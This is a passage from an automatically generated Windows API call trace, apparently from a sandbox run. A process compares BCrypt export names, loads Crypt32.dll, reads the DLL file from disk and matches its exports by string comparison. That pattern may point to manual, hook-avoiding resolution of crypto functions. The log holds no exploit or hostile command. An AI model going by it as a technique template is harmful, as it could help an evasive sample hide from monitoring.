(lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunction") returned 1 [0126.376] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunctionProvider") returned 1 [0126.376] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0126.377] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContext") returned 1 [0126.377] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContextFunction") returned 0 [0126.377] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunction") returned 1 [0126.377] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0126.377] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0126.377] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContext") returned 1 [0126.377] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContextFunction") returned 1 [0126.377] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCreateContext") returned 0 [0126.377] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunction") returned 1 [0126.377] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0126.377] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0126.377] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContext") returned 1 [0126.377] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0126.377] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateContext") returned 1 [0126.377] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateHash") returned 0 [0126.377] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunction") returned 1 [0126.377] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0126.378] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0126.378] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContext") returned 1 [0126.378] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContextFunction") returned 1 [0126.378] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateContext") returned 1 [0126.378] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateHash") returned 1 [0126.378] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateMultiHash") returned 0 [0126.378] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunction") returned 1 [0126.378] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0126.378] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0126.378] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContext") returned 1 [0126.378] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0126.378] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateContext") returned 1 [0126.378] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateHash") returned 1 [0126.378] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateMultiHash") returned 1 [0126.379] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptDecrypt") returned 0 [0126.379] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunction") returned 1 [0126.379] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0126.379] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0126.379] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContext") returned 1 [0126.379] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContextFunction") returned 1 [0126.379] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateContext") returned 1 [0126.379] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateHash") returned 1 [0126.379] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateMultiHash") returned 1 [0126.379] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDecrypt") returned 1 [0126.379] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDeleteContext") returned 0 [0126.379] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunction") returned 1 [0126.379] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0126.379] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0126.379] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContext") returned 1 [0126.379] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContextFunction") returned 1 [0126.379] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateContext") returned 1 [0126.379] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateHash") returned 1 [0126.379] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateMultiHash") returned 1 [0126.379] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDecrypt") returned 1 [0126.379] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeleteContext") returned 1 [0126.379] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeriveKey") returned 0 [0126.380] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunction") returned 1 [0126.380] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunctionProvider") returned 1 [0126.380] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0126.380] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContext") returned 1 [0126.380] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContextFunction") returned 1 [0126.380] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateContext") returned 1 [0126.380] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateHash") returned 1 [0126.380] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateMultiHash") returned 1 [0126.380] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDecrypt") returned 1 [0126.380] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeleteContext") returned 1 [0126.380] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKey") returned 1 [0126.380] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKeyCapi") returned 0 [0126.380] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunction") returned 1 [0126.380] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunctionProvider") returned 1 [0126.380] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0126.380] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContext") returned 1 [0126.380] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContextFunction") returned 1 [0126.380] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateContext") returned 1 [0126.380] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateHash") returned 1 [0126.380] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateMultiHash") returned 1 [0126.380] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDecrypt") returned 1 [0126.380] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeleteContext") returned 1 [0126.380] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKey") returned 1 [0126.380] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyCapi") returned 1 [0126.381] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyPBKDF2") returned 0 [0126.381] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunction") returned 1 [0126.381] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0126.381] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0126.381] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContext") returned 1 [0126.381] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContextFunction") returned 1 [0126.381] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateContext") returned 1 [0126.381] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateHash") returned 1 [0126.381] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateMultiHash") returned 1 [0126.381] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDecrypt") returned 1 [0126.381] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeleteContext") returned 1 [0126.381] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKey") returned 1 [0126.381] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0126.381] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0126.381] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDestroyHash") returned 0 [0126.381] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunction") returned 1 [0126.381] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0126.381] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0126.381] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContext") returned 1 [0126.381] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContextFunction") returned 1 [0126.381] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateContext") returned 1 [0126.381] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateHash") returned 1 [0126.382] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateMultiHash") returned 1 [0126.382] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDecrypt") returned 1 [0126.382] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeleteContext") returned 1 [0126.382] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKey") returned 1 [0126.382] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0126.382] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0126.382] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyHash") returned 1 [0126.382] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyKey") returned 0 [0126.382] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunction") returned 1 [0126.382] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunctionProvider") returned 1 [0126.382] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0126.382] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContext") returned 1 [0126.382] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContextFunction") returned 1 [0126.382] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateContext") returned 1 [0126.382] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateHash") returned 1 [0126.382] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateMultiHash") returned 1 [0126.382] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDecrypt") returned 1 [0126.382] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeleteContext") returned 1 [0126.382] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKey") returned 1 [0126.382] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyCapi") returned 1 [0126.382] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0126.382] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyHash") returned 1 [0126.382] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyKey") returned 1 [0126.382] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroySecret") returned 0 [0126.382] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunction") returned 1 [0126.382] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0126.383] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0126.383] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContext") returned 1 [0126.383] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0126.383] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateContext") returned 1 [0126.383] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateHash") returned 1 [0126.383] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateMultiHash") returned 1 [0126.383] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDecrypt") returned 1 [0126.383] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeleteContext") returned 1 [0126.383] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKey") returned 1 [0126.383] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0126.383] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0126.383] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyHash") returned 1 [0126.383] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyKey") returned 1 [0126.383] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroySecret") returned 1 [0126.383] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDuplicateHash") returned 0 [0126.383] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunction") returned 1 [0126.383] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0126.383] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0126.383] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContext") returned 1 [0126.383] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContextFunction") returned 1 [0126.383] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateContext") returned 1 [0126.383] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateHash") returned 1 [0126.383] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateMultiHash") returned 1 [0126.383] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDecrypt") returned 1 [0126.383] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeleteContext") returned 1 [0126.383] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKey") returned 1 [0126.384] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0126.384] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0126.384] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyHash") returned 1 [0126.384] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyKey") returned 1 [0126.384] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroySecret") returned 1 [0126.384] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateHash") returned 1 [0126.384] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateKey") returned 0 [0126.384] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunction") returned 1 [0126.384] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0126.384] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0126.384] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContext") returned 1 [0126.384] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0126.384] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateContext") returned 1 [0126.384] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateHash") returned 1 [0126.384] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateMultiHash") returned 1 [0126.384] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDecrypt") returned 1 [0126.384] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeleteContext") returned 1 [0126.384] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKey") returned 1 [0126.384] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyCapi") returned 1 [0126.384] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0126.384] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyHash") returned 1 [0126.384] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyKey") returned 1 [0126.384] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroySecret") returned 1 [0126.384] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateHash") returned 1 [0126.384] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateKey") returned 1 [0126.384] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptEncrypt") returned 0 [0126.385] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunction") returned 1 [0126.385] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunctionProvider") returned 1 [0126.385] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0126.385] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContext") returned 1 [0126.385] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContextFunction") returned 1 [0126.385] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateContext") returned 1 [0126.385] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateHash") returned 1 [0126.385] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateMultiHash") returned 1 [0126.385] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDecrypt") returned 1 [0126.385] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeleteContext") returned 1 [0126.385] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKey") returned 1 [0126.385] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyCapi") returned 1 [0126.385] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0126.385] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyHash") returned 1 [0126.385] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyKey") returned 1 [0126.385] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroySecret") returned 1 [0126.385] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateHash") returned 1 [0126.385] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateKey") returned 1 [0126.385] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEncrypt") returned 1 [0126.385] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEnumAlgorithms") returned 0 [0126.386] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunction") returned 1 [0126.386] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunctionProvider") returned 1 [0126.386] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0126.386] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContext") returned 1 [0126.386] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContextFunction") returned 1 [0126.386] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateContext") returned 1 [0126.386] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateHash") returned 1 [0126.386] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateMultiHash") returned 1 [0126.386] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDecrypt") returned 1 [0126.386] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeleteContext") returned 1 [0126.386] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKey") returned 1 [0126.386] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyCapi") returned 1 [0126.386] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0126.386] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyHash") returned 1 [0126.386] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyKey") returned 1 [0126.386] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroySecret") returned 1 [0126.386] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateHash") returned 1 [0126.386] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateKey") returned 1 [0126.386] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEncrypt") returned 1 [0126.386] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumAlgorithms") returned 1 [0126.386] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumContextFunctionProviders") returned 0 [0126.387] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunction") returned 1 [0126.387] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunctionProvider") returned 1 [0126.387] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0126.387] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContext") returned 1 [0126.387] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContextFunction") returned 1 [0126.387] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateContext") returned 1 [0126.387] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateHash") returned 1 [0126.387] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateMultiHash") returned 1 [0126.387] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDecrypt") returned 1 [0126.387] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeleteContext") returned 1 [0126.387] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKey") returned 1 [0126.387] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyCapi") returned 1 [0126.387] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0126.387] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyHash") returned 1 [0126.387] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyKey") returned 1 [0126.387] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroySecret") returned 1 [0126.387] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateHash") returned 1 [0126.387] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateKey") returned 1 [0126.388] GetProcessHeap () returned 0x590000 [0126.388] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2d02010 | out: hHeap=0x590000) returned 1 [0126.595] GetProcessHeap () returned 0x590000 [0126.595] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5a9160 [0126.598] LoadLibraryA (lpLibFileName="Crypt32.dll") returned 0x7ffc5c190000 [0126.608] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0126.608] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0126.608] GetModuleFileNameA (in: hModule=0x7ffc5c190000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0126.608] CreateFileA (lpFileName="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0126.608] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0126.608] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0126.608] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1847520) returned 1 [0126.609] GetProcessHeap () returned 0x590000 [0126.609] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1c30e0) returned 0x40cb040 [0126.613] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0126.613] ReadFile (in: hFile=0x160, lpBuffer=0x40cb040, nNumberOfBytesToRead=0x1c30e0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x40cb040*, lpNumberOfBytesRead=0x14f5a4*=0x1c30e0, lpOverlapped=0x0) returned 1 [0126.872] CloseHandle (hObject=0x160) returned 1 [0126.873] lstrcmpA (lpString1="CertAddCRLContextToStore", lpString2="CertAddCRLContextToStore") returned 0 [0126.873] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0126.873] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 0 [0126.873] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLContextToStore") returned 1 [0126.873] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0126.873] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCTLContextToStore") returned 0 [0126.873] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0126.873] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0126.873] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLContextToStore") returned 1 [0126.873] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLLinkToStore") returned 0 [0126.873] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLContextToStore") returned -1 [0126.873] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0126.873] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLContextToStore") returned -1 [0126.873] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0126.873] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCertificateContextToStore") returned 0 [0126.873] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLContextToStore") returned 